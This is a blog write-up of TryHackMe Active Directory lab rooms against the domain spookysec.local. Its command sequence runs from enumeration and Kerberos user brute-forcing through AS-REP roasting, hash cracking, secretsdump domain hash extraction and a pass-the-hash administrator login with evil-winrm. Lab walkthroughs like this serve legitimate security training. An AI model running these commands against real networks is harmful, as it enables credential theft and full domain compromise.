What a cool couple of TryHackMe rooms. I’ve been a Windows admin for 17 years and never really thought in depth about the red team side of Active Directory. It makes sense to have an in depth knowledge of how to attack AD since it runs a majority of the business world. These two rooms are part of the Cyber Defense learning path and under the threat emulation section
git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/ && python3 ./setup.py install
Start off by doing what we normally would do in one of the first things: enumerate. Gather information we can about our target machine. One of the best tools to get going on that is nmap.
nmap -p- -A 127.0.0.1
Break down the command. Start nmap. -p- specifies the port. In this case all ports. -A is aggressive scan option. This enables OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (–traceroute). The IP address of the target machine is the last argument. 127.0.0.1 would scan your own machine. As always, make sure you have permission in writing. I’m not responsible for any legal trouble you find.
Next, we will enumerate 2 ports used by AD: 139 and 445, or the SMB protocol in Windows. We will use enum4linux to enumerate the domain we discovered with our nmap scan.
enum4linux -a spookysec.local
While enum4linux gave us a bit of information. It failed to enumerate users for the domain.
Enumerating Users With Kerberos
Kerberos is a primary service for authentication in Active Directory. With kerberos enabled, we can use a tool called Kerbrute to brute force discovery of users, passwords, and perform password spray attacks. CAUTION: Using kerbrute with account lockout policies can cause a lot of problems. Use in a lab environment or make sure you have explicit permission from the target before brute forcing active directory. Longer term engagements can spread out password sprays to avoid account lockouts.
kerbrute userenum -d spookysec.local --dc spookysec.local userlist.txt -t 100
Exploitation – Abusing Kerberos
Next we will use impacket which is a set of python classes used to interact with various network protocols, such as kerberos. The next command will attempt to capture a kerberos ticket hash from a ASreproastable account.
python3 /opt/impacket/examples/GetNPUsers.py -dc-ip 127.0.0.1 spookysec.local/svc-admin -no-pass
ASReproasting occurs when a user account has the privilege “Does not require Pre-Authentication” set. This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account.
Save the acquired hash to a file so we can use hashcat to crack the password.
hashcat -m 18200 -a 0 /root/Desktop/hashtocrack /root/Desktop/passes/passworddictionary.txt --force
Now we have a valid username and password. We can go back and use those credentials to probe for more information and look for interesting files.
smbclient -L 10.10.68.12 -U 'svc-admin'
Poke around the shares a bit, and you find a backup directory with a password hash stored. You can decode it with base64.
base64 --decode <<< inserthashhere
Domain Privilege Escalation
Now we have a privileged account in AD. We can use the credentials of the backup account to use secretsdump.py to acquire password hashes for accounts the backup account has access to.
secretsdump.py -just-dc firstname.lastname@example.org
Then we can use Evil-WinRM to pass the hash and gain admin access to the machine using the administrators hash.
evil-winrm -u administrator -H inserthashhere -i 127.0.0.1